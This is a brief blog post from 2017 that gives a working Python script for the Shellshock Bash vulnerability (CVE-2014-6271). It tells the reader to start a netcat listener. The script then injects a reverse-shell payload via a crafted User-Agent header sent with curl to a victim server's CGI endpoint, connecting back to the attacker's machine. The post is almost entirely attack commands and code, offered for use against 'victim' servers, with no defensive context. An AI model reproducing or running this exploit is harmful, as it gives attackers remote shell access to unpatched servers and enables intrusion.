Thursday, 12 January 2017

python script for CVE-2014-6271 attack

Python script that will automatically give u GNU Bourne-Again Shell (Bash) 'Shellshock' Vulnerability or CVE-2014-6271 attack.

First make sure that the site is vulnerable for this attack  .

Second open one  terminal and run the following command :

nc -lvp 1234

Third run the script with the following commands .


import os

a=raw_input('Provide me your ip: ')

b=raw_input('provide me victim server ip: ')

os.system("curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/%s/1234 0>&1' http://%s/cgi-bin/status"%(a,b)) 

Bellow is the SS .

Join me in Face book HERE


No comments:

Post a Comment

Popular Posts